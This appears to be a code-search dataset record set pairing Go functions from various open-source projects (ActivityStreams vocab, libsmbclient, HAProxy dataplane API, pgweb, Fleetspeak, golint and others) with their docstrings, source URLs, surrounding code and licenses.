if p, err := mgr.DeserializeContentPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsContent = p
}
if p, err := mgr.DeserializeContextPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsContext = p
}
if p, err := mgr.DeserializeDurationPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsDuration = p
}
if p, err := mgr.DeserializeEndTimePropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsEndTime = p
}
if p, err := mgr.DeserializeGeneratorPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsGenerator = p
}
if p, err := mgr.DeserializeIconPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsIcon = p
}
if p, err := mgr.DeserializeIdPropertyJSONLD()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.JSONLDId = p
}
if p, err := mgr.DeserializeImagePropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsImage = p
}
if p, err := mgr.DeserializeInReplyToPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsInReplyTo = p
}
if p, err := mgr.DeserializeInstrumentPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsInstrument = p
}
if p, err := mgr.DeserializeLikesPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsLikes = p
}
if p, err := mgr.DeserializeLocationPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsLocation = p
}
if p, err := mgr.DeserializeMediaTypePropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsMediaType = p
}
if p, err := mgr.DeserializeNamePropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsName = p
}
if p, err := mgr.DeserializeObjectPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsObject = p
}
if p, err := mgr.DeserializeOriginPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsOrigin = p
}
if p, err := mgr.DeserializePreviewPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsPreview = p
}
if p, err := mgr.DeserializePublishedPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsPublished = p
}
if p, err := mgr.DeserializeRepliesPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsReplies = p
}
if p, err := mgr.DeserializeResultPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsResult = p
}
if p, err := mgr.DeserializeSharesPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsShares = p
}
if p, err := mgr.DeserializeSourcePropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsSource = p
}
if p, err := mgr.DeserializeStartTimePropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsStartTime = p
}
if p, err := mgr.DeserializeSummaryPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsSummary = p
}
if p, err := mgr.DeserializeTagPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsTag = p
}
if p, err := mgr.DeserializeTargetPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsTarget = p
}
if p, err := mgr.DeserializeTeamPropertyForgeFed()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ForgeFedTeam = p
}
if p, err := mgr.DeserializeTicketsTrackedByPropertyForgeFed()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ForgeFedTicketsTrackedBy = p
}
if p, err := mgr.DeserializeToPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsTo = p
}
if p, err := mgr.DeserializeTracksTicketsForPropertyForgeFed()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ForgeFedTracksTicketsFor = p
}
if p, err := mgr.DeserializeTypePropertyJSONLD()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.JSONLDType = p
}
if p, err := mgr.DeserializeUpdatedPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsUpdated = p
}
if p, err := mgr.DeserializeUrlPropertyActivityStreams()(m, aliasMap); err != nil {
return nil, err
} else if p != nil {
this.ActivityStreamsUrl = p
}
for k, v := range m {
if k == "actor" {
continue
} else if k == "altitude" {
continue
} else if k == "attachment" {
continue
} else if k == "attributedTo" {
continue
} else if k == "audience" {
continue
} else if k == "bcc" {
continue
} else if k == "bto" {
continue
} else if k == "cc" {
continue
} else if k == "content" {
continue
} else if k == "contentMap" {
continue
} else if k == "context" {
continue
} else if k == "duration" {
continue
} else if k == "endTime" {
continue
} else if k == "generator" {
continue
} else if k == "icon" {
continue
} else if k == "id" {
continue
} else if k == "image" {
continue
} else if k == "inReplyTo" {
continue
} else if k == "instrument" {
continue
} else if k == "likes" {
continue
} else if k == "location" {
continue
} else if k == "mediaType" {
continue
} else if k == "name" {
continue
} else if k == "nameMap" {
continue
} else if k == "object" {
continue
} else if k == "origin" {
continue
} else if k == "preview" {
continue
} else if k == "published" {
continue
} else if k == "replies" {
continue
} else if k == "result" {
continue
} else if k == "shares" {
continue
} else if k == "source" {
continue
} else if k == "startTime" {
continue
} else if k == "summary" {
continue
} else if k == "summaryMap" {
continue
} else if k == "tag" {
continue
} else if k == "target" {
continue
} else if k == "team" {
continue
} else if k == "ticketsTrackedBy" {
continue
} else if k == "to" {
continue
} else if k == "tracksTicketsFor" {
continue
} else if k == "type" {
continue
} else if k == "updated" {
continue
} else if k == "url" {
continue
}
this.unknown[k] = v
}
return this, nil
}
func IsOrExtendsActivity(other vocab.Type) bool {
if other.GetTypeName() == "Activity" {
return true
}
return ActivityIsExtendedBy(other)
}
func NewActivityStreamsActivity() *ActivityStreamsActivity {
typeProp := typePropertyConstructor()
typeProp.AppendXMLSchemaString("Activity")
return &ActivityStreamsActivity{
JSONLDType: typeProp,
alias: "",
unknown: make(map[string]interface{}),
}
}
func (this ActivityStreamsActivity) GetActivityStreamsActor() vocab.ActivityStreamsActorProperty {
return this.ActivityStreamsActor
}
func (this ActivityStreamsActivity) GetActivityStreamsAltitude() vocab.ActivityStreamsAltitudeProperty {
return this.ActivityStreamsAltitude
}
func (this ActivityStreamsActivity) GetActivityStreamsAttachment() vocab.ActivityStreamsAttachmentProperty {
return this.ActivityStreamsAttachment
}
func (this ActivityStreamsActivity) GetActivityStreamsAttributedTo() vocab.ActivityStreamsAttributedToProperty {
return this.ActivityStreamsAttributedTo
}
func (this ActivityStreamsActivity) GetActivityStreamsAudience() vocab.ActivityStreamsAudienceProperty {
return this.ActivityStreamsAudience
}
func (this ActivityStreamsActivity) GetActivityStreamsBcc() vocab.ActivityStreamsBccProperty {
return this.ActivityStreamsBcc
}
func (this ActivityStreamsActivity) GetActivityStreamsBto() vocab.ActivityStreamsBtoProperty {
return this.ActivityStreamsBto
}
func (this ActivityStreamsActivity) GetActivityStreamsCc() vocab.ActivityStreamsCcProperty {
return this.ActivityStreamsCc
}
func (this ActivityStreamsActivity) GetActivityStreamsContent() vocab.ActivityStreamsContentProperty {
return this.ActivityStreamsContent
}
func (this ActivityStreamsActivity) GetActivityStreamsContext() vocab.ActivityStreamsContextProperty {
return this.ActivityStreamsContext
}
func (this ActivityStreamsActivity) GetActivityStreamsDuration() vocab.ActivityStreamsDurationProperty {
return this.ActivityStreamsDuration
}
func (this ActivityStreamsActivity) GetActivityStreamsEndTime() vocab.ActivityStreamsEndTimeProperty {
return this.ActivityStreamsEndTime
}
func (this ActivityStreamsActivity) GetActivityStreamsGenerator() vocab.ActivityStreamsGeneratorProperty {
return this.ActivityStreamsGenerator
}
func (this ActivityStreamsActivity) GetActivityStreamsIcon() vocab.ActivityStreamsIconProperty {
return this.ActivityStreamsIcon
}
func (this ActivityStreamsActivity) GetActivityStreamsImage() vocab.ActivityStreamsImageProperty {
return this.ActivityStreamsImage
}
func (this ActivityStreamsActivity) GetActivityStreamsInReplyTo() vocab.ActivityStreamsInReplyToProperty {
return this.ActivityStreamsInReplyTo
}
func (this ActivityStreamsActivity) GetActivityStreamsInstrument() vocab.ActivityStreamsInstrumentProperty {
return this.ActivityStreamsInstrument
}
func (this ActivityStreamsActivity) GetActivityStreamsLikes() vocab.ActivityStreamsLikesProperty {
return this.ActivityStreamsLikes
}
func (this ActivityStreamsActivity) GetActivityStreamsLocation() vocab.ActivityStreamsLocationProperty {
return this.ActivityStreamsLocation
} | BSD 3-Clause New or Revised License |
mvo5/libsmbclient-go | libsmbclient.go | SetAuthCallback | go | func (c *Client) SetAuthCallback(f AuthCallback) {
c.smbMu.Lock()
defer c.smbMu.Unlock()
C.my_smbc_init_auth_callback(c.ctx, unsafe.Pointer(&f))
c.authCallback = &f
} | SetAuthCallback assigns the authentication function that will be called during connection
with samba. | https://github.com/mvo5/libsmbclient-go/blob/f9fa2a5c1104393a9bf39a4eed1de66e6cff4335/libsmbclient.go#L127-L135 | package libsmbclient
import (
"fmt"
"io"
"sync"
"unsafe"
)
import "C"
type SmbcType int
const (
SmbcWorkgroup SmbcType = C.SMBC_WORKGROUP
SmbcFileShare = C.SMBC_FILE_SHARE
SmbcPrinterShare = C.SMBC_PRINTER_SHARE
SmbcCommsShare = C.SMBC_COMMS_SHARE
SmbcIPCShare = C.SMBC_IPC_SHARE
SmbcDir = C.SMBC_DIR
SmbcFile = C.SMBC_FILE
SmbcLink = C.SMBC_LINK
)
var smbMu = sync.Mutex{}
type Client struct {
ctx *C.SMBCCTX
authCallback *AuthCallback
smbMu *sync.Mutex
}
type Dirent struct {
Type SmbcType
Comment string
Name string
}
type File struct {
client *Client
smbcfile *C.SMBCFILE
}
func New() *Client {
smbMu.Lock()
defer smbMu.Unlock()
c := &Client{
ctx: C.smbc_new_context(),
smbMu: &smbMu,
}
C.smbc_init_context(c.ctx)
return c
}
func (c *Client) Destroy() error {
return c.Close()
}
func (c *Client) Close() error {
c.smbMu.Lock()
defer c.smbMu.Unlock()
var err error
if c.ctx != nil {
_, err = C.smbc_free_context(c.ctx, C.int(1))
c.ctx = nil
}
return err
}
type AuthCallback = func(serverName, shareName string) (domain, username, password string) | MIT License |
haproxytech/dataplaneapi | operations/spoe/create_spoe_group_responses.go | NewCreateSpoeGroupConflict | go | func NewCreateSpoeGroupConflict() *CreateSpoeGroupConflict {
return &CreateSpoeGroupConflict{}
} | NewCreateSpoeGroupConflict creates CreateSpoeGroupConflict with default headers values | https://github.com/haproxytech/dataplaneapi/blob/b362aae0b04d0e330bd9dcfbf9f315b670de013b/operations/spoe/create_spoe_group_responses.go#L161-L164 | package spoe
import (
"net/http"
"github.com/go-openapi/runtime"
"github.com/haproxytech/client-native/v2/models"
)
const CreateSpoeGroupCreatedCode int = 201
type CreateSpoeGroupCreated struct {
Payload *models.SpoeGroup `json:"body,omitempty"`
}
func NewCreateSpoeGroupCreated() *CreateSpoeGroupCreated {
return &CreateSpoeGroupCreated{}
}
func (o *CreateSpoeGroupCreated) WithPayload(payload *models.SpoeGroup) *CreateSpoeGroupCreated {
o.Payload = payload
return o
}
func (o *CreateSpoeGroupCreated) SetPayload(payload *models.SpoeGroup) {
o.Payload = payload
}
func (o *CreateSpoeGroupCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {
rw.WriteHeader(201)
if o.Payload != nil {
payload := o.Payload
if err := producer.Produce(rw, payload); err != nil {
panic(err)
}
}
}
const CreateSpoeGroupBadRequestCode int = 400
type CreateSpoeGroupBadRequest struct {
ConfigurationVersion string `json:"Configuration-Version"`
Payload *models.Error `json:"body,omitempty"`
}
func NewCreateSpoeGroupBadRequest() *CreateSpoeGroupBadRequest {
return &CreateSpoeGroupBadRequest{}
}
func (o *CreateSpoeGroupBadRequest) WithConfigurationVersion(configurationVersion string) *CreateSpoeGroupBadRequest {
o.ConfigurationVersion = configurationVersion
return o
}
func (o *CreateSpoeGroupBadRequest) SetConfigurationVersion(configurationVersion string) {
o.ConfigurationVersion = configurationVersion
}
func (o *CreateSpoeGroupBadRequest) WithPayload(payload *models.Error) *CreateSpoeGroupBadRequest {
o.Payload = payload
return o
}
func (o *CreateSpoeGroupBadRequest) SetPayload(payload *models.Error) {
o.Payload = payload
}
func (o *CreateSpoeGroupBadRequest) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {
configurationVersion := o.ConfigurationVersion
if configurationVersion != "" {
rw.Header().Set("Configuration-Version", configurationVersion)
}
rw.WriteHeader(400)
if o.Payload != nil {
payload := o.Payload
if err := producer.Produce(rw, payload); err != nil {
panic(err)
}
}
}
const CreateSpoeGroupConflictCode int = 409
type CreateSpoeGroupConflict struct {
ConfigurationVersion string `json:"Configuration-Version"`
Payload *models.Error `json:"body,omitempty"`
} | Apache License 2.0 |
anz-bank/go-course | 10_rest/runnerdave/pkg/puppy/store/map_store.go | ReadPuppy | go | func (m *MapStore) ReadPuppy(id int16) (puppy.Puppy, error) {
if puppy, ok := m.puppies[id]; ok {
return puppy, nil
}
return puppy.Puppy{}, puppy.Errorf(puppy.ErrIDNotFound, "puppy with ID:%d not found", id)
} | ReadPuppy reads store by Puppy ID | https://github.com/anz-bank/go-course/blob/cf576ffe0ec3db4ee1834533a43ea439d27973bc/10_rest/runnerdave/pkg/puppy/store/map_store.go#L32-L37 | package store
import (
puppy "github.com/anz-bank/go-course/10_rest/runnerdave/pkg/puppy"
)
type MapStore struct {
puppies map[int16]puppy.Puppy
nextID int16
}
func NewMapStore() *MapStore {
return &MapStore{
nextID: 1,
puppies: map[int16]puppy.Puppy{}}
}
func (m *MapStore) CreatePuppy(p puppy.Puppy) error {
if err := puppy.ValidateValue(p.Value); err != nil {
return err
}
p.ID = m.nextID
m.puppies[p.ID] = p
m.nextID++
return nil
} | Apache License 2.0 |
sosedoff/pgweb | pkg/api/middleware.go | dbCheckMiddleware | go | func dbCheckMiddleware() gin.HandlerFunc {
return func(c *gin.Context) {
path := strings.Replace(c.Request.URL.Path, command.Opts.Prefix, "", -1)
if allowedPaths[path] {
c.Next()
return
}
if !command.Opts.Sessions {
if DbClient == nil {
badRequest(c, errNotConnected)
return
}
c.Next()
return
}
sid := getSessionId(c.Request)
if sid == "" {
badRequest(c, errSessionRequired)
return
}
conn := DbSessions[sid]
if conn == nil {
badRequest(c, errNotConnected)
return
}
c.Next()
}
} | Middleware to check database connection status before running queries | https://github.com/sosedoff/pgweb/blob/be6ef48d407dcfccfb5a06681d698a03dde30759/pkg/api/middleware.go#L13-L50 | package api
import (
"log"
"strings"
"github.com/gin-gonic/gin"
"github.com/sosedoff/pgweb/pkg/command"
) | MIT License |
uber-archive/cherami-server | common/configure/commonappconfig.go | GetFrontendConfig | go | func (r *AppConfig) GetFrontendConfig() CommonFrontendConfig {
return r.FrontendConfig
} | GetFrontendConfig returns the frontend config | https://github.com/uber-archive/cherami-server/blob/da747b7be487feeaba1a5d7cb01e71343e6f8452/common/configure/commonappconfig.go#L72-L74 | package configure
type AppConfig struct {
LogConfig *LogConfiguration `yaml:"logging"`
DefaultServiceConfig *ServiceConfig `yaml:"DefaultServiceConfig"`
ServiceConfig map[string]*ServiceConfig `yaml:"ServiceConfig"`
MetadataConfig *MetadataConfig `yaml:"MetadataConfig"`
ControllerConfig *ControllerConfig `yaml:"ControllerConfig"`
FrontendConfig *FrontendConfig `yaml:"FrontendConfig"`
StorageConfig *StorageConfig `yaml:"StorageConfig"`
ReplicatorConfig *ReplicatorConfig `yaml:"ReplicatorConfig"`
KafkaConfig *KafkaConfig `yaml:"KafkaConfig"`
DefaultDestinationConfig *DestinationConfig `yaml:"DefaultDestinationConfig"`
}
func NewCommonAppConfig() CommonAppConfig {
return &AppConfig{
LogConfig: NewCommonLogConfig(),
DefaultServiceConfig: NewCommonServiceConfig(),
ServiceConfig: make(map[string]*ServiceConfig),
MetadataConfig: NewCommonMetadataConfig(),
ControllerConfig: NewCommonControllerConfig(),
FrontendConfig: NewCommonFrontendConfig(),
StorageConfig: NewCommonStorageConfig(),
ReplicatorConfig: NewCommonReplicatorConfig(),
DefaultDestinationConfig: NewDestinationConfig(),
KafkaConfig: NewCommonKafkaConfig(),
}
}
func (r *AppConfig) GetServiceConfig(sName string) CommonServiceConfig {
sCfg, _ := r.ServiceConfig[sName]
return sCfg
}
func (r *AppConfig) GetMetadataConfig() CommonMetadataConfig {
return r.MetadataConfig
}
func (r *AppConfig) GetControllerConfig() CommonControllerConfig {
return r.ControllerConfig
} | MIT License |
google/fleetspeak | fleetspeak/src/client/socketservice/client/proxy.go | OpenChannel | go | func OpenChannel(socketPath string, version string) *channel.RelentlessChannel {
return channel.NewRelentlessChannel(
func() (*channel.Channel, func()) {
sd, err := ptypes.MarshalAny(&fcpb.StartupData{Pid: int64(os.Getpid()), Version: version})
if err != nil {
log.Fatalf("unable to marshal StartupData: %v", err)
}
m := &fspb.Message{
MessageType: "StartupData",
Destination: &fspb.Address{ServiceName: "system"},
Data: sd,
}
L:
for {
ch, fin := buildChannel(socketPath)
if ch == nil {
return ch, fin
}
select {
case e := <-ch.Err:
log.Errorf("Channel failed with error: %v", e)
fin()
continue L
case ch.Out <- m:
return ch, fin
}
}
})
} | OpenChannel creates a channel.RelentlessChannel to a fleetspeak client
through an agreed upon unix domain socket. | https://github.com/google/fleetspeak/blob/a386c35b582a0220609bbd5fb3e7057bff43ddaa/fleetspeak/src/client/socketservice/client/proxy.go#L49-L77 | package client
import (
"os"
"time"
log "github.com/golang/glog"
"github.com/golang/protobuf/ptypes"
"github.com/google/fleetspeak/fleetspeak/src/client/channel"
fcpb "github.com/google/fleetspeak/fleetspeak/src/client/channel/proto/fleetspeak_channel"
fspb "github.com/google/fleetspeak/fleetspeak/src/common/proto/fleetspeak"
)
const (
maxChannelRetryDelay = 15 * time.Second
channelRetryBackoffFactor = 1.5
)
func backOffChannelRetryDelay(currentDelay time.Duration) time.Duration {
newDelay := time.Duration(float64(currentDelay) * channelRetryBackoffFactor)
if newDelay > maxChannelRetryDelay {
return maxChannelRetryDelay
} else {
return newDelay
}
} | Apache License 2.0 |
leopardslab/dunner | internal/util/util.go | DirExists | go | func DirExists(dir string) bool {
if strings.HasPrefix(dir, "~") {
dir = path.Join(HomeDir, strings.Trim(dir, "~"))
}
src, err := os.Stat(dir)
if err != nil {
return false
}
return src.IsDir()
} | DirExists returns true if the given param is a valid existing directory | https://github.com/leopardslab/dunner/blob/3017143faf209b074073e442092119a820ec5291/internal/util/util.go#L50-L59 | package util
import (
"flag"
"fmt"
"io"
"io/ioutil"
"net/http"
"os"
"os/exec"
"path"
"strings"
"time"
"github.com/leopardslab/dunner/internal/logger"
)
var log = logger.Log
var HomeDir = os.Getenv("HOME")
var userDir = os.Getenv("user")
type progressReader struct {
io.Reader
bytesTransfered int64
totalBytes int64
progress float64
progressDisplayed bool
}
func (w *progressReader) Read(p []byte) (int, error) {
n, err := w.Reader.Read(p)
if n > 0 {
w.bytesTransfered += int64(n)
percent := float64(w.bytesTransfered) * float64(100) / float64(w.totalBytes)
if percent-w.progress > 4 {
fmt.Print(".")
w.progress = percent
w.progressDisplayed = true
}
}
return n, err
} | MIT License |
bnei-baruch/archive-backend | utils/middleware.go | RecoveryMiddleware | go | func RecoveryMiddleware() gin.HandlerFunc {
return func(c *gin.Context) {
defer func() {
if rval := recover(); rval != nil {
debug.PrintStack()
err, ok := rval.(error)
if !ok {
err = errors.Errorf("panic: %s", rval)
}
c.AbortWithError(http.StatusInternalServerError, err).SetType(gin.ErrorTypePrivate)
}
}()
c.Next()
}
} | Recover with error | https://github.com/bnei-baruch/archive-backend/blob/5d750b0b9edf6554adfdb0708593146050c0c816/utils/middleware.go#L51-L66 | package utils
import (
"database/sql"
"encoding/json"
"fmt"
"net/http"
"runtime/debug"
"time"
log "github.com/Sirupsen/logrus"
"github.com/pkg/errors"
"gopkg.in/gin-gonic/gin.v1"
"gopkg.in/go-playground/validator.v8"
)
func DataStoresMiddleware(mbdDB *sql.DB, esManager, logger, cm interface{} , tc interface{}, cms interface{}, variables interface{}) gin.HandlerFunc {
return func(c *gin.Context) {
c.Set("MDB_DB", mbdDB)
c.Set("ES_MANAGER", esManager)
c.Set("LOGGER", logger)
c.Set("CACHE", cm)
c.Set("VARIABLES", variables)
c.Set("TOKENS_CACHE", tc)
c.Set("CMS", cms)
c.Next()
}
}
func LoggerMiddleware() gin.HandlerFunc {
return func(c *gin.Context) {
start := time.Now()
path := c.Request.URL.RequestURI()
c.Next()
log.WithFields(log.Fields{
"status": c.Writer.Status(),
"method": c.Request.Method,
"path": path,
"latency": time.Now().Sub(start),
"ip": c.ClientIP(),
"user-agent": c.Request.UserAgent(),
}).Info()
}
} | MIT License |
digota/digota | product/product.go | WriteMethods | go | func WriteMethods() []*regexp.Regexp {
return []*regexp.Regexp{
regexp.MustCompile(baseMethod + "New"),
regexp.MustCompile(baseMethod + "Update"),
regexp.MustCompile(baseMethod + "Delete"),
}
} | WriteMethods returns regexp slice of writable methods, mostly used by the acl | https://github.com/digota/digota/blob/c2a16d57bfe0fd0d6f3a7b9a71122668a24c1e6c/product/product.go#L70-L76 | package product
import (
"github.com/digota/digota/product/productpb"
"google.golang.org/grpc"
"regexp"
)
const baseMethod = "^(.productpb.ProductService/)"
var service Interface
type Interface interface {
productpb.ProductServiceServer
}
func RegisterService(p Interface) {
if service != nil {
panic("ProductService is already registered")
}
service = p
}
func Service() Interface {
if service == nil {
panic("ProductService is not registered")
}
return service
}
func RegisterProductServer(server *grpc.Server) {
productpb.RegisterProductServiceServer(server, Service())
}
func ReadMethods() []*regexp.Regexp {
return []*regexp.Regexp{
regexp.MustCompile(baseMethod + "Get"),
regexp.MustCompile(baseMethod + "List"),
}
} | MIT License |
criyle/go-judge | worker/file.go | EnvFile | go | func (f *CachedFile) EnvFile(fs filestore.FileStore) (envexec.File, error) {
_, fd := fs.Get(f.FileID)
if fd == nil {
return nil, fmt.Errorf("file not exists with id %v", f.FileID)
}
return fd, nil
} | EnvFile prepares file for envexec file | https://github.com/criyle/go-judge/blob/7f0b066258abadabec48cb1cb08d7ee83d7bbfc8/worker/file.go#L60-L66 | package worker
import (
"bytes"
"fmt"
"github.com/criyle/go-judge/envexec"
"github.com/criyle/go-judge/filestore"
)
type CmdFile interface {
EnvFile(fs filestore.FileStore) (envexec.File, error)
String() string
}
var (
_ CmdFile = &LocalFile{}
_ CmdFile = &MemoryFile{}
_ CmdFile = &CachedFile{}
_ CmdFile = &Collector{}
)
type LocalFile struct {
Src string
}
func (f *LocalFile) EnvFile(fs filestore.FileStore) (envexec.File, error) {
return envexec.NewFileInput(f.Src), nil
}
func (f *LocalFile) String() string {
return fmt.Sprintf("local:%s", f.Src)
}
type MemoryFile struct {
Content []byte
}
func (f *MemoryFile) EnvFile(fs filestore.FileStore) (envexec.File, error) {
return envexec.NewFileReader(bytes.NewReader(f.Content), false), nil
}
func (f *MemoryFile) String() string {
return fmt.Sprintf("memory:(len:%d)", len(f.Content))
}
type CachedFile struct {
FileID string
} | MIT License |
browsefile/backend | src/lib/web/users.go | parseUserFromRequest | go | func parseUserFromRequest(c *fb.Context) (*fb.UserModel, string, error) {
if c.REQ.Body == nil {
return nil, "", cnst.ErrEmptyRequest
}
mod := &ModifyUserRequest{}
err := json.NewDecoder(c.REQ.Body).Decode(mod)
if err != nil {
return nil, "", err
}
if mod.What != "user" {
return nil, "", cnst.ErrWrongDataType
}
mod.Data.FileSystem = c.NewFS(c.GetUserHomePath())
mod.Data.FileSystemPreview = c.NewFS(c.GetUserPreviewPath())
return mod.Data, mod.Which, nil
} | parseUserFromRequest returns the user which is present in the request
body. If the body is empty or the JSON is invalid, it
returns an fb.Error. | https://github.com/browsefile/backend/blob/d7bd10276405a22706605505d24da07029db823b/src/lib/web/users.go#L62-L83 | package web
import (
"encoding/json"
"errors"
"github.com/browsefile/backend/src/cnst"
"net/http"
"os"
"strings"
fb "github.com/browsefile/backend/src/lib"
)
type ModifyRequest struct {
What string `json:"what"`
Which string `json:"which"`
}
type ModifyUserRequest struct {
ModifyRequest
Data *fb.UserModel `json:"data"`
}
func usersHandler(c *fb.Context) (int, error) {
if !c.User.Admin && c.Method != http.MethodGet {
return http.StatusForbidden, nil
}
switch c.Method {
case http.MethodGet:
return usersGetHandler(c)
case http.MethodPost:
return usersPostHandler(c)
case http.MethodDelete:
return usersDeleteHandler(c)
case http.MethodPut:
return usersPutHandler(c)
}
return http.StatusNotImplemented, nil
}
func getUserName(r string) (string) {
sid := strings.TrimPrefix(r, "/")
sid = strings.TrimSuffix(sid, "/")
return sid
} | Apache License 2.0 |
mosaicnetworks/evm-lite | src/version/version_test.go | TestFlagEmpty | go | func TestFlagEmpty(t *testing.T) {
if len(Flag) > 0 {
t.Fatalf("Version Flag is not empty: %s", Flag)
}
} | TestFlagEmpty fails if version.Flag is not empty. We use this internally to
enforce an empty flag on the master branch. This is an arbitrary rule we use
in Mosaic Networks to differentiate between dev code and production code. | https://github.com/mosaicnetworks/evm-lite/blob/730249f55ec76df2fb573c4e62b971afc50d05f7/src/version/version_test.go#L10-L14 | package version
import "testing" | MIT License |
suzuki-shunsuke/flute | flute/matcher.go | isMatchService | go | func isMatchService(req *http.Request, service Service) bool {
return req.URL.Scheme+"://"+req.URL.Host == service.Endpoint
} | isMatchService returns whether the request matches with the service.
isMatchService checks the request URL.Scheme and URL.Host are equal to the service endpoint. | https://github.com/suzuki-shunsuke/flute/blob/a5d0ff52380047775c422049bb95e05251896017/flute/matcher.go#L15-L17 | package flute
import (
"fmt"
"io/ioutil"
"net/http"
"reflect"
"strings"
"github.com/suzuki-shunsuke/go-dataeq/dataeq"
) | MIT License |
komuw/ote | testdata/mod3/vendor/golang.org/x/lint/lint.go | lintExported | go | func (f *file) lintExported() {
if f.isTest() {
return
}
var lastGen *ast.GenDecl
genDeclMissingComments := make(map[*ast.GenDecl]bool)
f.walk(func(node ast.Node) bool {
switch v := node.(type) {
case *ast.GenDecl:
if v.Tok == token.IMPORT {
return false
}
lastGen = v
return true
case *ast.FuncDecl:
f.lintFuncDoc(v)
if v.Recv == nil {
f.checkStutter(v.Name, "func")
}
return false
case *ast.TypeSpec:
doc := v.Doc
if doc == nil {
doc = lastGen.Doc
}
f.lintTypeDoc(v, doc)
f.checkStutter(v.Name, "type")
return false
case *ast.ValueSpec:
f.lintValueSpecDoc(v, lastGen, genDeclMissingComments)
return false
}
return true
})
} | lintExported examines the exported names.
It complains if any required doc comments are missing,
or if they are not of the right form. The exact rules are in
lintFuncDoc, lintTypeDoc and lintValueSpecDoc; this function
also tracks the GenDecl structure being traversed to permit
doc comments for constants to be on top of the const block.
It also complains if the names stutter when combined with
the package name. | https://github.com/komuw/ote/blob/63e90a9e7b21f4b0c8fb12e19b39b4abf9002d39/testdata/mod3/vendor/golang.org/x/lint/lint.go#L483-L527 | package lint
import (
"bufio"
"bytes"
"fmt"
"go/ast"
"go/parser"
"go/printer"
"go/token"
"go/types"
"regexp"
"sort"
"strconv"
"strings"
"unicode"
"unicode/utf8"
"golang.org/x/tools/go/ast/astutil"
"golang.org/x/tools/go/gcexportdata"
)
const styleGuideBase = "https://golang.org/wiki/CodeReviewComments"
type Linter struct {
}
type Problem struct {
Position token.Position
Text string
Link string
Confidence float64
LineText string
Category string
ReplacementLine string
}
func (p *Problem) String() string {
if p.Link != "" {
return p.Text + "\n\n" + p.Link
}
return p.Text
}
type byPosition []Problem
func (p byPosition) Len() int { return len(p) }
func (p byPosition) Swap(i, j int) { p[i], p[j] = p[j], p[i] }
func (p byPosition) Less(i, j int) bool {
pi, pj := p[i].Position, p[j].Position
if pi.Filename != pj.Filename {
return pi.Filename < pj.Filename
}
if pi.Line != pj.Line {
return pi.Line < pj.Line
}
if pi.Column != pj.Column {
return pi.Column < pj.Column
}
return p[i].Text < p[j].Text
}
func (l *Linter) Lint(filename string, src []byte) ([]Problem, error) {
return l.LintFiles(map[string][]byte{filename: src})
}
func (l *Linter) LintFiles(files map[string][]byte) ([]Problem, error) {
pkg := &pkg{
fset: token.NewFileSet(),
files: make(map[string]*file),
}
var pkgName string
for filename, src := range files {
if isGenerated(src) {
continue
}
f, err := parser.ParseFile(pkg.fset, filename, src, parser.ParseComments)
if err != nil {
return nil, err
}
if pkgName == "" {
pkgName = f.Name.Name
} else if f.Name.Name != pkgName {
return nil, fmt.Errorf("%s is in package %s, not %s", filename, f.Name.Name, pkgName)
}
pkg.files[filename] = &file{
pkg: pkg,
f: f,
fset: pkg.fset,
src: src,
filename: filename,
}
}
if len(pkg.files) == 0 {
return nil, nil
}
return pkg.lint(), nil
}
var (
genHdr = []byte("// Code generated ")
genFtr = []byte(" DO NOT EDIT.")
)
func isGenerated(src []byte) bool {
sc := bufio.NewScanner(bytes.NewReader(src))
for sc.Scan() {
b := sc.Bytes()
if bytes.HasPrefix(b, genHdr) && bytes.HasSuffix(b, genFtr) && len(b) >= len(genHdr)+len(genFtr) {
return true
}
}
return false
}
type pkg struct {
fset *token.FileSet
files map[string]*file
typesPkg *types.Package
typesInfo *types.Info
sortable map[string]bool
